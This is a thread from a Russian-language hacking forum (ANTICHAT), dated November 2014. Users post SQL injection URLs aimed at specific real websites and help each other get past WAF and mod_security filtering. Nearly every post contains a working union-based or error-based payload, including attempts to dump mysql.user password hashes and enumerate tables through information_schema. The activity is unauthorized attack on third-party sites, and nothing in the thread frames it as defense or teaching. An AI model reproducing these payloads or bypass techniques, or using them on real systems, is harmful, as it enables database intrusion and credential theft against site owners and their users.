ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.11.2014, 16:25
|
|
Познающий
Регистрация: 16.08.2012
Сообщений: 92
Провел на форуме:
36068
Репутация:
0
|
|
оо спасибо @HAXTA4OK. Скинула вопрос в личку, чтоб тут не спамить
|
|
|
16.11.2014, 19:04
|
|
Познающий
Регистрация: 16.08.2012
Сообщений: 92
Провел на форуме:
36068
Репутация:
0
|
|
Может кто ещё подскажет?
Как фильтрацию дальше для from обойти? Лочат опять
Код:
http://www.vijphoto.com/index2.php?id=-73+/*!union*/+/*!select*/+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!mysql.user.password*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*/+/*!from*/+/*!mysql.user*/--+
|
|
|
|
17.11.2014, 09:26
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от vikler
Может кто ещё подскажет?
Как фильтрацию дальше для from обойти? Лочат опять
Код:
http://www.vijphoto.com/index2.php?id=-73+/*!union*/+/*!select*/+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!mysql.user.password*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*/+/*!from*/+/*!mysql.user*/--+
www.vijphoto.com/index2.php?id=- 73+/*!12345union*/+/*!select*/+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!table_name*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*//*!from*//*!information_schema.tables*/where table_schema=database()+--+l
|
|
|
|
17.11.2014, 09:58
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Сообщение от vikler
Может кто ещё подскажет?
Как фильтрацию дальше для from обойти? Лочат опять
Код:
http://www.vijphoto.com/index2.php?id=-73+/*!union*/+/*!select*/+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!mysql.user.password*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*/+/*!from*/+/*!mysql.user*/--+
http://www.vijphoto.com/index2.php?id=-73 /*!union*/ (select*from (select 1) a1 join (select 2) a2 join (select 3) a3 join (select 4) a4 join (select 5) a5 join (select 6) a6 join (select 7) a7 join (select 8) a8 join (select 9) a9 join (select 10) a10 join (select 11) a11 join (select 12) a12 join (select 13) a13 join (select 14) a14 join (select 15) a15 join (select version()) a16 join (select 17) a17 join (select 18) a18 join (select 19) a19 join (select 20) a20 join (select 21) a21 join (select 22) a22 join (select 23) a23)
=)
|
|
|
|
27.11.2014, 16:41
|
|
Познающий
Регистрация: 20.09.2012
Сообщений: 53
Провел на форуме:
20084
Репутация:
0
|
|
возвращает это:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''test'' ORDER BY id DESC LIMIT 0, 9' at line 1
Когда пытаюсь крутить срабатывает mod_security
Обхожу так
Код:
http://execstyle.com/catPage.php?cat=test+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10+--+
После этого я виже весь свой запрос на экране
если поставить после test кавычку, возвращает следующее:
The used SELECT statements have a different number of columns |
|
|
|
27.11.2014, 16:43
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от erwap
возвращает это:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''test'' ORDER BY id DESC LIMIT 0, 9' at line 1
Когда пытаюсь крутить срабатывает mod_security
Обхожу так
Код:
http://execstyle.com/catPage.php?cat=test+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10+--+
После этого я виже весь свой запрос на экране
если поставить после test кавычку, возвращает следующее:
The used SELECT statements have a different number of columns через error based всё вытягивает отлично
|
|
|
|
27.11.2014, 17:21
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от erwap
возвращает это:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''test'' ORDER BY id DESC LIMIT 0, 9' at line 1
Когда пытаюсь крутить срабатывает mod_security
Обхожу так
Код:
http://execstyle.com/catPage.php?cat=test+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10+--+
После этого я виже весь свой запрос на экране
если поставить после test кавычку, возвращает следующее:
The used SELECT statements have a different number of columns Очень интересный WAF. Заинтересовала возможность вывода именно "union+select" методом.
Во-первых - там всего 1 поле.
Сообщение от None
_http://execstyle.com/catPage.php?cat=test%27and(1)=1+order+by+2%23
Во-вторых, фильтруется связка union+select. Обходится стандартно.
Сообщение от None
http://execstyle.com/catPage.php?cat=test%27and(1)=1%0Aunion(select())% 23
В-третьих, фильтруются какие либо текстовые или числовые данные, следующие за select. Всё, кроме спецсимволов.
Сообщение от None
http://execstyle.com/catPage.php?cat=test%27and(1)=1%0Aunion(select(@@) )%23
Но селекция проходит при условия отсутствия union в запросе. Этим и объясняется возможность раскрутки Error-based вектором.
Думаю над путями обхода, люблю WAF)
|
|
|
|
27.11.2014, 22:15
|
|
Познающий
Регистрация: 20.09.2012
Сообщений: 53
Провел на форуме:
20084
Репутация:
0
|
|
BigBear, напиши потом, как получиться
|
|
|
|
29.11.2014, 14:30
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
Провел на форуме:
179197
Репутация:
25
|
|
http://www.humidordiscount.com/cigar_clubs.php?selected_country=SG'+order+by+1+--+
Подтолкните на мыслю какую нибудь
Непонятно что и как фильтрует
|
|
|
|
29.11.2014, 14:42
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от Br@!ns
http://www.humidordiscount.com/cigar_clubs.php?selected_country=SG'+order+by+1+--+
Подтолкните на мыслю какую нибудь
Непонятно что и как фильтрует
Там нету уязвимости.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
